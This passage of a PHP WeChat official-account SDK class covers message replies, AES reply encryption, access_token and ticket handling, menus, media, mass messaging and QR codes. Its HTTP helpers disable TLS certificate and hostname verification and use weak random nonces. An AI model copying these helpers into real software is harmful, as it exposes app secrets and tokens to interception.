\'Description\'=>\'summary text\', * \'PicUrl\'=>\'http://www.domain.com/1.jpg\', * \'Url\'=>\'http://www.domain.com/1.html\' * ), * "1"=>.... * ) */ public function news($newsData=array()) { $FuncFlag = $this->_funcflag ? 1 : 0; $count = count($newsData); $msg = array( \'ToUserName\' => $this->getRevFrom(), \'FromUserName\'=>$this->getRevTo(), \'MsgType\'=>self::MSGTYPE_NEWS, \'CreateTime\'=>time(), \'ArticleCount\'=>$count, \'Articles\'=>$newsData, \'FuncFlag\'=>$FuncFlag ); $this->Message($msg); return $this; } /** * * 回复微信服务器, 此函数支持链式操作 * Example: $this->text(\'msg tips\')->reply(); * @param string $msg 要发送的信息, 默认取$this->_msg * @param bool $return 是否返回信息而不抛出到浏览器 默认:否 */ public function reply($msg=array(),$return = false) { if (empty($msg)) { if (empty($this->_msg)) //防止不先设置回复内容,直接调用reply方法导致异常 return false; $msg = $this->_msg; } $xmldata= $this->xml_encode($msg); $this->log($xmldata); if ($this->encrypt_type == \'aes\') { //如果来源消息为加密方式 $pc = new Prpcrypt($this->encodingAesKey); $array = $pc->encrypt($xmldata, $this->appid); $ret = $array[0]; if ($ret != 0) { $this->log(\'encrypt err!\'); return false; } $timestamp = time(); $nonce = rand(77,999)*rand(605,888)*rand(11,99); $encrypt = $array[1]; $tmpArr = array($this->token, $timestamp, $nonce,$encrypt);//比普通公众平台多了一个加密的密文 sort($tmpArr, SORT_STRING); $signature = implode($tmpArr); $signature = sha1($signature); $xmldata = $this->generate($encrypt, $signature, $timestamp, $nonce); $this->log($xmldata); } if ($return) return $xmldata; else echo $xmldata; } /** * xml格式加密,仅请求为加密方式时再用 */ private function generate($encrypt, $signature, $timestamp, $nonce) { //格式化加密信息 $format = "<xml> <Encrypt><![CDATA[%s]]></Encrypt> <MsgSignature><![CDATA[%s]]></MsgSignature> <TimeStamp>%s</TimeStamp> <Nonce><![CDATA[%s]]></Nonce> </xml>"; return sprintf($format, $encrypt, $signature, $timestamp, $nonce); } /** * GET 请求 * @param string $url */ private function http_get($url){ $oCurl = curl_init(); if(stripos($url,"https://")!==FALSE){ curl_setopt($oCurl, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($oCurl, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($oCurl, CURLOPT_SSLVERSION, 1); //CURL_SSLVERSION_TLSv1 } curl_setopt($oCurl, CURLOPT_URL, $url); curl_setopt($oCurl, CURLOPT_RETURNTRANSFER, 1 ); $sContent = curl_exec($oCurl); $aStatus = curl_getinfo($oCurl); curl_close($oCurl); if(intval($aStatus["http_code"])==200){ return $sContent; }else{ return false; } } /** * POST 请求 * @param string $url * @param array $param * @param boolean $post_file 是否文件上传 * @return string content */ private function http_post($url,$param,$post_file=false){ $oCurl = curl_init(); if(stripos($url,"https://")!==FALSE){ curl_setopt($oCurl, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($oCurl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($oCurl, CURLOPT_SSLVERSION, 1); //CURL_SSLVERSION_TLSv1 } if (is_string($param) || $post_file) { $strPOST = $param; } else { $aPOST = array(); foreach($param as $key=>$val){ $aPOST[] = $key."=".urlencode($val); } $strPOST = join("&", $aPOST); } curl_setopt($oCurl, CURLOPT_URL, $url); curl_setopt($oCurl, CURLOPT_RETURNTRANSFER, 1 ); curl_setopt($oCurl, CURLOPT_POST,true); curl_setopt($oCurl, CURLOPT_POSTFIELDS,$strPOST); $sContent = curl_exec($oCurl); $aStatus = curl_getinfo($oCurl); curl_close($oCurl); if(intval($aStatus["http_code"])==200){ return $sContent; }else{ return false; } } /** * 设置缓存,按需重载 * @param string $cachename * @param mixed $value * @param int $expired * @return boolean */ protected function setCache($cachename,$value,$expired){ //TODO: set cache implementation return false; } /** * 获取缓存,按需重载 * @param string $cachename * @return mixed */ protected function getCache($cachename){ //TODO: get cache implementation return false; } /** * 清除缓存,按需重载 * @param string $cachename * @return boolean */ protected function removeCache($cachename){ //TODO: remove cache implementation return false; } /** * 获取access_token * @param string $appid 如在类初始化时已提供,则可为空 * @param string $appsecret 如在类初始化时已提供,则可为空 * @param string $token 手动指定access_token,非必要情况不建议用 */ public function checkAuth($appid=\'\',$appsecret=\'\',$token=\'\'){ if (!$appid || !$appsecret) { $appid = $this->appid; $appsecret = $this->appsecret; } if ($token) { //手动指定token,优先使用 $this->access_token=$token; return $this->access_token; } $authname = \'wechat_access_token\'.$appid; if ($rs = $this->getCache($authname)) { $this->access_token = $rs; return $rs; } $result = $this->http_get(self::API_URL_PREFIX.self::AUTH_URL.\'appid=\'.$appid.\'&secret=\'.$appsecret); if ($result) { $json = json_decode($result,true); if (!$json || isset($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } $this->access_token = $json[\'access_token\']; $expire = $json[\'expires_in\'] ? intval($json[\'expires_in\'])-100 : 3600; $this->setCache($authname,$this->access_token,$expire); return $this->access_token; } return false; } /** * 删除验证数据 * @param string $appid */ public function resetAuth($appid=\'\'){ if (!$appid) $appid = $this->appid; $this->access_token = \'\'; $authname = \'wechat_access_token\'.$appid; $this->removeCache($authname); return true; } /** * 删除JSAPI授权TICKET * @param string $appid 用于多个appid时使用 */ public function resetJsTicket($appid=\'\'){ if (!$appid) $appid = $this->appid; $this->jsapi_ticket = \'\'; $authname = \'wechat_jsapi_ticket\'.$appid; $this->removeCache($authname); return true; } /** * 获取JSAPI授权TICKET * @param string $appid 用于多个appid时使用,可空 * @param string $jsapi_ticket 手动指定jsapi_ticket,非必要情况不建议用 */ public function getJsTicket($appid=\'\',$jsapi_ticket=\'\'){ if (!$this->access_token && !$this->checkAuth()) return false; if (!$appid) $appid = $this->appid; if ($jsapi_ticket) { //手动指定token,优先使用 $this->jsapi_ticket = $jsapi_ticket; return $this->jsapi_ticket; } $authname = \'wechat_jsapi_ticket\'.$appid; if ($rs = $this->getCache($authname)) { $this->jsapi_ticket = $rs; return $rs; } $result = $this->http_get(self::API_URL_PREFIX.self::GET_TICKET_URL.\'access_token=\'.$this->access_token.\'&type=jsapi\'); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } $this->jsapi_ticket = $json[\'ticket\']; $expire = $json[\'expires_in\'] ? intval($json[\'expires_in\'])-100 : 3600; $this->setCache($authname,$this->jsapi_ticket,$expire); return $this->jsapi_ticket; } return false; } /** * 获取JsApi使用签名 * @param string $url 网页的URL,自动处理#及其后面部分 * @param string $timestamp 当前时间戳 (为空则自动生成) * @param string $noncestr 随机串 (为空则自动生成) * @param string $appid 用于多个appid时使用,可空 * @return array|bool 返回签名字串 */ public function getJsSign($url, $timestamp=0, $noncestr=\'\', $appid=\'\'){ if (!$this->jsapi_ticket && !$this->getJsTicket($appid) || !$url) return false; if (!$timestamp) $timestamp = time(); if (!$noncestr) $noncestr = $this->generateNonceStr(); $ret = strpos($url,\'#\'); if ($ret) $url = substr($url,0,$ret); $url = trim($url); if (empty($url)) return false; $arrdata = array("timestamp" => $timestamp, "noncestr" => $noncestr, "url" => $url, "jsapi_ticket" => $this->jsapi_ticket); $sign = $this->getSignature($arrdata); if (!$sign) return false; $signPackage = array( "appId" => $this->appid, "nonceStr" => $noncestr, "timestamp" => $timestamp, "url" => $url, "signature" => $sign ); return $signPackage; } /** * 微信api不支持中文转义的json结构 * @param array $arr */ static function json_encode($arr) { $parts = array (); $is_list = false; //Find out if the given array is a numerical array $keys = array_keys ( $arr ); $max_length = count ( $arr ) - 1; if (($keys [0] === 0) && ($keys [$max_length] === $max_length )) { //See if the first key is 0 and last key is length - 1 $is_list = true; for($i = 0; $i < count ( $keys ); $i ++) { //See if each key correspondes to its position if ($i != $keys [$i]) { //A key fails at position check. $is_list = false; //It is an associative array. break; } } } foreach ( $arr as $key => $value ) { if (is_array ( $value )) { //Custom handling for arrays if ($is_list) $parts [] = self::json_encode ( $value ); /* :RECURSION: */ else $parts [] = \'"\' . $key . \'":\' . self::json_encode ( $value ); /* :RECURSION: */ } else { $str = \'\'; if (! $is_list) $str = \'"\' . $key . \'":\'; //Custom handling for multiple data types if (!is_string ( $value ) && is_numeric ( $value ) && $value<2000000000) $str .= $value; //Numbers elseif ($value === false) $str .= \'false\'; //The booleans elseif ($value === true) $str .= \'true\'; else $str .= \'"\' . addslashes ( $value ) . \'"\'; //All other things // :TODO: Is there any more datatype we should be in the lookout for? (Object?) $parts [] = $str; } } $json = implode ( \',\', $parts ); if ($is_list) return \'[\' . $json . \']\'; //Return numerical JSON return \'{\' . $json . \'}\'; //Return associative JSON } /** * 获取签名 * @param array $arrdata 签名数组 * @param string $method 签名方法 * @return boolean|string 签名值 */ public function getSignature($arrdata,$method="sha1") { if (!function_exists($method)) return false; ksort($arrdata); $paramstring = ""; foreach($arrdata as $key => $value) { if(strlen($paramstring) == 0) $paramstring .= $key . "=" . $value; else $paramstring .= "&" . $key . "=" . $value; } $Sign = $method($paramstring); return $Sign; } /** * 获取微信卡券api_ticket * @param string $appid 用于多个appid时使用,可空 * @param string $api_ticket 手动指定api_ticket,非必要情况不建议用 */ public function getJsCardTicket($appid=\'\',$api_ticket=\'\'){ if (!$this->access_token && !$this->checkAuth()) return false; if (!$appid) $appid = $this->appid; if ($api_ticket) { //手动指定token,优先使用 $this->api_ticket = $api_ticket; return $this->api_ticket; } $authname = \'wechat_api_ticket_wxcard\'.$appid; if ($rs = $this->getCache($authname)) { $this->api_ticket = $rs; return $rs; } $result = $this->http_get(self::API_URL_PREFIX.self::GET_TICKET_URL.\'access_token=\'.$this->access_token.\'&type=wx_card\'); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } $this->api_ticket = $json[\'ticket\']; $expire = $json[\'expires_in\'] ? intval($json[\'expires_in\'])-100 : 3600; $this->setCache($authname,$this->api_ticket,$expire); return $this->api_ticket; } return false; } /** * 获取微信卡券签名 * @param array $arrdata 签名数组 * @param string $method 签名方法 * @return boolean|string 签名值 */ public function getTicketSignature($arrdata,$method="sha1") { if (!function_exists($method)) return false; $newArray = array(); foreach($arrdata as $key => $value) { array_push($newArray,(string)$value); } sort($newArray,SORT_STRING); return $method(implode($newArray)); } /** * 生成随机字串 * @param number $length 长度,默认为16,最长为32字节 * @return string */ public function generateNonceStr($length=16){ // 密码字符集,可任意添加你需要的字符 $chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"; $str = ""; for($i = 0; $i < $length; $i++) { $str .= $chars[mt_rand(0, strlen($chars) - 1)]; } return $str; } /** * 获取微信服务器IP地址列表 * @return array(\'127.0.0.1\',\'127.0.0.1\') */ public function getServerIp(){ if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_get(self::API_URL_PREFIX.self::CALLBACKSERVER_GET_URL.\'access_token=\'.$this->access_token); if ($result) { $json = json_decode($result,true); if (!$json || isset($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json[\'ip_list\']; } return false; } /** * 创建菜单(认证后的订阅号可用) * @param array $data 菜单数组数据 * example: * array ( * \'button\' => array ( * 0 => array ( * \'name\' => \'扫码\', * \'sub_button\' => array ( * 0 => array ( * \'type\' => \'scancode_waitmsg\', * \'name\' => \'扫码带提示\', * \'key\' => \'rselfmenu_0_0\', * ), * 1 => array ( * \'type\' => \'scancode_push\', * \'name\' => \'扫码推事件\', * \'key\' => \'rselfmenu_0_1\', * ), * ), * ), * 1 => array ( * \'name\' => \'发图\', * \'sub_button\' => array ( * 0 => array ( * \'type\' => \'pic_sysphoto\', * \'name\' => \'系统拍照发图\', * \'key\' => \'rselfmenu_1_0\', * ), * 1 => array ( * \'type\' => \'pic_photo_or_album\', * \'name\' => \'拍照或者相册发图\', * \'key\' => \'rselfmenu_1_1\', * ) * ), * ), * 2 => array ( * \'type\' => \'location_select\', * \'name\' => \'发送位置\', * \'key\' => \'rselfmenu_2_0\' * ), * ), * ) * type可以选择为以下几种,其中5-8除了收到菜单事件以外,还会单独收到对应类型的信息。 * 1、click:点击推事件 * 2、view:跳转URL * 3、scancode_push:扫码推事件 * 4、scancode_waitmsg:扫码推事件且弹出“消息接收中”提示框 * 5、pic_sysphoto:弹出系统拍照发图 * 6、pic_photo_or_album:弹出拍照或者相册发图 * 7、pic_weixin:弹出微信相册发图器 * 8、location_select:弹出地理位置选择器 */ public function createMenu($data){ if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_URL_PREFIX.self::MENU_CREATE_URL.\'access_token=\'.$this->access_token,self::json_encode($data)); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return true; } return false; } /** * 获取菜单(认证后的订阅号可用) * @return array(\'menu\'=>array(....s)) */ public function getMenu(){ if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_get(self::API_URL_PREFIX.self::MENU_GET_URL.\'access_token=\'.$this->access_token); if ($result) { $json = json_decode($result,true); if (!$json || isset($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 删除菜单(认证后的订阅号可用) * @return boolean */ public function deleteMenu(){ if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_get(self::API_URL_PREFIX.self::MENU_DELETE_URL.\'access_token=\'.$this->access_token); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return true; } return false; } /** * 上传临时素材,有效期为3天(认证后的订阅号可用) * 注意:上传大文件时可能需要先调用 set_time_limit(0) 避免超时 * 注意:数组的键值任意,但文件名前必须加@,使用单引号以避免本地路径斜杠被转义 * 注意:临时素材的media_id是可复用的! * @param array $data {"media":\'@Path\filename.jpg\'} * @param type 类型:图片:image 语音:voice 视频:video 缩略图:thumb * @return boolean|array */ public function uploadMedia($data, $type){ if (!$this->access_token && !$this->checkAuth()) return false; //原先的上传多媒体文件接口使用 self::UPLOAD_MEDIA_URL 前缀 $result = $this->http_post(self::API_URL_PREFIX.self::MEDIA_UPLOAD_URL.\'access_token=\'.$this->access_token.\'&type=\'.$type,$data,true); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 获取临时素材(认证后的订阅号可用) * @param string $media_id 媒体文件id * @param boolean $is_video 是否为视频文件,默认为否 * @return raw data */ public function getMedia($media_id,$is_video=false){ if (!$this->access_token && !$this->checkAuth()) return false; //原先的上传多媒体文件接口使用 self::UPLOAD_MEDIA_URL 前缀 //如果要获取的素材是视频文件时,不能使用https协议,必须更换成http协议 $url_prefix = $is_video?str_replace(\'https\',\'http\',self::API_URL_PREFIX):self::API_URL_PREFIX; $result = $this->http_get($url_prefix.self::MEDIA_GET_URL.\'access_token=\'.$this->access_token.\'&media_id=\'.$media_id); if ($result) { if (is_string($result)) { $json = json_decode($result,true); if (isset($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } } return $result; } return false; } /** * 上传图片,本接口所上传的图片不占用公众号的素材库中图片数量的5000个的限制。图片仅支持jpg/png格式,大小必须在1MB以下。 (认证后的订阅号可用) * 注意:上传大文件时可能需要先调用 set_time_limit(0) 避免超时 * 注意:数组的键值任意,但文件名前必须加@,使用单引号以避免本地路径斜杠被转义 * @param array $data {"media":\'@Path\filename.jpg\'} * * @return boolean|array */ public function uploadImg($data){ if (!$this->access_token && !$this->checkAuth()) return false; //原先的上传多媒体文件接口使用 self::UPLOAD_MEDIA_URL 前缀 $result = $this->http_post(self::API_URL_PREFIX.self::MEDIA_UPLOADIMG_URL.\'access_token=\'.$this->access_token,$data,true); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 上传永久素材(认证后的订阅号可用) * 新增的永久素材也可以在公众平台官网素材管理模块中看到 * 注意:上传大文件时可能需要先调用 set_time_limit(0) 避免超时 * 注意:数组的键值任意,但文件名前必须加@,使用单引号以避免本地路径斜杠被转义 * @param array $data {"media":\'@Path\filename.jpg\'} * @param type 类型:图片:image 语音:voice 视频:video 缩略图:thumb * @param boolean $is_video 是否为视频文件,默认为否 * @param array $video_info 视频信息数组,非视频素材不需要提供 array(\'title\'=>\'视频标题\',\'introduction\'=>\'描述\') * @return boolean|array */ public function uploadForeverMedia($data, $type,$is_video=false,$video_info=array()){ if (!$this->access_token && !$this->checkAuth()) return false; //#TODO 暂不确定此接口是否需要让视频文件走http协议 //如果要获取的素材是视频文件时,不能使用https协议,必须更换成http协议 //$url_prefix = $is_video?str_replace(\'https\',\'http\',self::API_URL_PREFIX):self::API_URL_PREFIX; //当上传视频文件时,附加视频文件信息 if ($is_video) $data[\'description\'] = self::json_encode($video_info); $result = $this->http_post(self::API_URL_PREFIX.self::MEDIA_FOREVER_UPLOAD_URL.\'access_token=\'.$this->access_token.\'&type=\'.$type,$data,true); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 上传永久图文素材(认证后的订阅号可用) * 新增的永久素材也可以在公众平台官网素材管理模块中看到 * @param array $data 消息结构{"articles":[{...}]} * @return boolean|array */ public function uploadForeverArticles($data){ if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_URL_PREFIX.self::MEDIA_FOREVER_NEWS_UPLOAD_URL.\'access_token=\'.$this->access_token,self::json_encode($data)); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 修改永久图文素材(认证后的订阅号可用) * 永久素材也可以在公众平台官网素材管理模块中看到 * @param string $media_id 图文素材id * @param array $data 消息结构{"articles":[{...}]} * @param int $index 更新的文章在图文素材的位置,第一篇为0,仅多图文使用 * @return boolean|array */ public function updateForeverArticles($media_id,$data,$index=0){ if (!$this->access_token && !$this->checkAuth()) return false; if (!isset($data[\'media_id\'])) $data[\'media_id\'] = $media_id; if (!isset($data[\'index\'])) $data[\'index\'] = $index; $result = $this->http_post(self::API_URL_PREFIX.self::MEDIA_FOREVER_NEWS_UPDATE_URL.\'access_token=\'.$this->access_token,self::json_encode($data)); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 获取永久素材(认证后的订阅号可用) * 返回图文消息数组或二进制数据,失败返回false * @param string $media_id 媒体文件id * @param boolean $is_video 是否为视频文件,默认为否 * @return boolean|array|raw data */ public function getForeverMedia($media_id,$is_video=false){ if (!$this->access_token && !$this->checkAuth()) return false; $data = array(\'media_id\' => $media_id); //#TODO 暂不确定此接口是否需要让视频文件走http协议 //如果要获取的素材是视频文件时,不能使用https协议,必须更换成http协议 //$url_prefix = $is_video?str_replace(\'https\',\'http\',self::API_URL_PREFIX):self::API_URL_PREFIX; $result = $this->http_post(self::API_URL_PREFIX.self::MEDIA_FOREVER_GET_URL.\'access_token=\'.$this->access_token,self::json_encode($data)); if ($result) { if (is_string($result)) { $json = json_decode($result,true); if ($json) { if (isset($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } else { return $result; } } return $result; } return false; } /** * 删除永久素材(认证后的订阅号可用) * @param string $media_id 媒体文件id * @return boolean */ public function delForeverMedia($media_id){ if (!$this->access_token && !$this->checkAuth()) return false; $data = array(\'media_id\' => $media_id); $result = $this->http_post(self::API_URL_PREFIX.self::MEDIA_FOREVER_DEL_URL.\'access_token=\'.$this->access_token,self::json_encode($data)); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return true; } return false; } /** * 获取永久素材列表(认证后的订阅号可用) * @param string $type 素材的类型,图片(image)、视频(video)、语音 (voice)、图文(news) * @param int $offset 全部素材的偏移位置,0表示从第一个素材 * @param int $count 返回素材的数量,取值在1到20之间 * @return boolean|array * 返回数组格式: * array( * \'total_count\'=>0, //该类型的素材的总数 * \'item_count\'=>0, //本次调用获取的素材的数量 * \'item\'=>array() //素材列表数组,内容定义请参考官方文档 * ) */ public function getForeverList($type,$offset,$count){ if (!$this->access_token && !$this->checkAuth()) return false; $data = array( \'type\' => $type, \'offset\' => $offset, \'count\' => $count, ); $result = $this->http_post(self::API_URL_PREFIX.self::MEDIA_FOREVER_BATCHGET_URL.\'access_token=\'.$this->access_token,self::json_encode($data)); if ($result) { $json = json_decode($result,true); if (isset($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 获取永久素材总数(认证后的订阅号可用) * @return boolean|array * 返回数组格式: * array( * \'voice_count\'=>0, //语音总数量 * \'video_count\'=>0, //视频总数量 * \'image_count\'=>0, //图片总数量 * \'news_count\'=>0 //图文总数量 * ) */ public function getForeverCount(){ if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_get(self::API_URL_PREFIX.self::MEDIA_FOREVER_COUNT_URL.\'access_token=\'.$this->access_token); if ($result) { $json = json_decode($result,true); if (isset($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 上传图文消息素材,用于群发(认证后的订阅号可用) * @param array $data 消息结构{"articles":[{...}]} * @return boolean|array */ public function uploadArticles($data){ if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_URL_PREFIX.self::MEDIA_UPLOADNEWS_URL.\'access_token=\'.$this->access_token,self::json_encode($data)); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 上传视频素材(认证后的订阅号可用) * @param array $data 消息结构 * { * "media_id"=>"", //通过上传媒体接口得到的MediaId * "title"=>"TITLE", //视频标题 * "description"=>"Description" //视频描述 * } * @return boolean|array * { * "type":"video", * "media_id":"mediaid", * "created_at":1398848981 * } */ public function uploadMpVideo($data){ if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::UPLOAD_MEDIA_URL.self::MEDIA_VIDEO_UPLOAD.\'access_token=\'.$this->access_token,self::json_encode($data)); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 高级群发消息, 根据OpenID列表群发图文消息(订阅号不可用) * 注意:视频需要在调用uploadMedia()方法后,再使用 uploadMpVideo() 方法生成, * 然后获得的 mediaid 才能用于群发,且消息类型为 mpvideo 类型。 * @param array $data 消息结构 * { * "touser"=>array( * "OPENID1", * "OPENID2" * ), * "msgtype"=>"mpvideo", * // 在下面5种类型中选择对应的参数内容 * // mpnews | voice | image | mpvideo => array( "media_id"=>"MediaId") * // text => array ( "content" => "hello") * } * @return boolean|array */ public function sendMassMessage($data){ if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_URL_PREFIX.self::MASS_SEND_URL.\'access_token=\'.$this->access_token,self::json_encode($data)); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 高级群发消息, 根据群组id群发图文消息(认证后的订阅号可用) * 注意:视频需要在调用uploadMedia()方法后,再使用 uploadMpVideo() 方法生成, * 然后获得的 mediaid 才能用于群发,且消息类型为 mpvideo 类型。 * @param array $data 消息结构 * { * "filter"=>array( * "is_to_all"=>False, //是否群发给所有用户.True不用分组id,False需填写分组id * "group_id"=>"2" //群发的分组id * ), * "msgtype"=>"mpvideo", * // 在下面5种类型中选择对应的参数内容 * // mpnews | voice | image | mpvideo => array( "media_id"=>"MediaId") * // text => array ( "content" => "hello") * } * @return boolean|array */ public function sendGroupMassMessage($data){ if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_URL_PREFIX.self::MASS_SEND_GROUP_URL.\'access_token=\'.$this->access_token,self::json_encode($data)); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 高级群发消息, 删除群发图文消息(认证后的订阅号可用) * @param int $msg_id 消息id * @return boolean|array */ public function deleteMassMessage($msg_id){ if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_URL_PREFIX.self::MASS_DELETE_URL.\'access_token=\'.$this->access_token,self::json_encode(array(\'msg_id\'=>$msg_id))); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return true; } return false; } /** * 高级群发消息, 预览群发消息(认证后的订阅号可用) * 注意:视频需要在调用uploadMedia()方法后,再使用 uploadMpVideo() 方法生成, * 然后获得的 mediaid 才能用于群发,且消息类型为 mpvideo 类型。 * @param array $data 消息结构 * { * "touser"=>"OPENID", * "msgtype"=>"mpvideo", * // 在下面5种类型中选择对应的参数内容 * // mpnews | voice | image | mpvideo => array( "media_id"=>"MediaId") * // text => array ( "content" => "hello") * } * @return boolean|array */ public function previewMassMessage($data){ if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_URL_PREFIX.self::MASS_PREVIEW_URL.\'access_token=\'.$this->access_token,self::json_encode($data)); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 高级群发消息, 查询群发消息发送状态(认证后的订阅号可用) * @param int $msg_id 消息id * @return boolean|array * { * "msg_id":201053012, //群发消息后返回的消息id * "msg_status":"SEND_SUCCESS" //消息发送后的状态,SENDING表示正在发送 SEND_SUCCESS表示发送成功 * } */ public function queryMassMessage($msg_id){ if (!$this->access_token && !$this->checkAuth()) return false; $result = $this->http_post(self::API_URL_PREFIX.self::MASS_QUERY_URL.\'access_token=\'.$this->access_token,self::json_encode(array(\'msg_id\'=>$msg_id))); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 创建二维码ticket * @param int|string $scene_id 自定义追踪id,临时二维码只能用数值型 * @param int $type 0:临时二维码;1:永久二维码(此时expire参数无效);2:永久二维码(此时expire参数无效) * @param int $expire 临时二维码有效期,最大为604800秒 * @return array(\'ticket\'=>\'qrcode字串\',\'expire_seconds\'=>604800,\'url\'=>\'二维码图片解析后的地址\') */ public function getQRCode($scene_id,$type=0,$expire=604800){ if (!$this->access_token && !$this->checkAuth()) return false; $type = ($type && is_string($scene_id))?2:$type; $data = array( \'action_name\'=>$type?($type == 2?"QR_LIMIT_STR_SCENE":"QR_LIMIT_SCENE"):"QR_SCENE", \'expire_seconds\'=>$expire, \'action_info\'=>array(\'scene\'=>($type == 2?array(\'scene_str\'=>$scene_id):array(\'scene_id\'=>$scene_id))) ); if ($type == 1) { unset($data[\'expire_seconds\']); } $result = $this->http_post(self::API_URL_PREFIX.self::QRCODE_CREATE_URL.\'access_token=\'.$this->access_token,self::json_encode($data)); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json; } return false; } /** * 获取二维码图片 * @param string $ticket 传入由getQRCode方法生成的ticket参数 * @return string url 返回http地址 */ public function getQRUrl($ticket) { return self::QRCODE_IMG_URL.urlencode($ticket); } /** * 长链接转短链接接口 * @param string $long_url 传入要转换的长url * @return boolean|string url 成功则返回转换后的短url */ public function getShortUrl($long_url){ if (!$this->access_token && !$this->checkAuth()) return false; $data = array( \'action\'=>\'long2short\', \'long_url\'=>$long_url ); $result = $this->http_post(self::API_URL_PREFIX.self::SHORT_URL.\'access_token=\'.$this->access_token,self::json_encode($data)); if ($result) { $json = json_decode($result,true); if (!$json || !empty($json[\'errcode\'])) { $this->errCode = $json[\'errcode\']; $this->errMsg = $json[\'errmsg\']; return false; } return $json[\'short_url\']; } return false; } /** * 获取统计数据 * @param string $type 数据分类(user|article|upstreammsg|interface)分别为(用户分析|图文分析|消息分析|接口分析) * @param string $subtype 数据子分类,参考 DATACUBE_URL_ARR 常量定义部分 或者README.md说明文档 * @param string $begin_date 开始时间 * @param string $end_date 结束时间 * @return boolean|array 成功返回查询结果数组,其定义请看官方文档 */ public function getDatacube($type,$subtype,$begin_date,$end_date=\'\'){ if (!$this->access_token && !$this->checkAuth()) return false; if (!isset(self::$DATACUBE_URL_ARR[$type]) || !isset(self::$DATACUBE_URL_ARR[$type][$subtype])) return false; $data = array( \'begin_date\'=>$begin_date, \'end_date\'=>$end_date?$end_date:$begin_date ); $result = 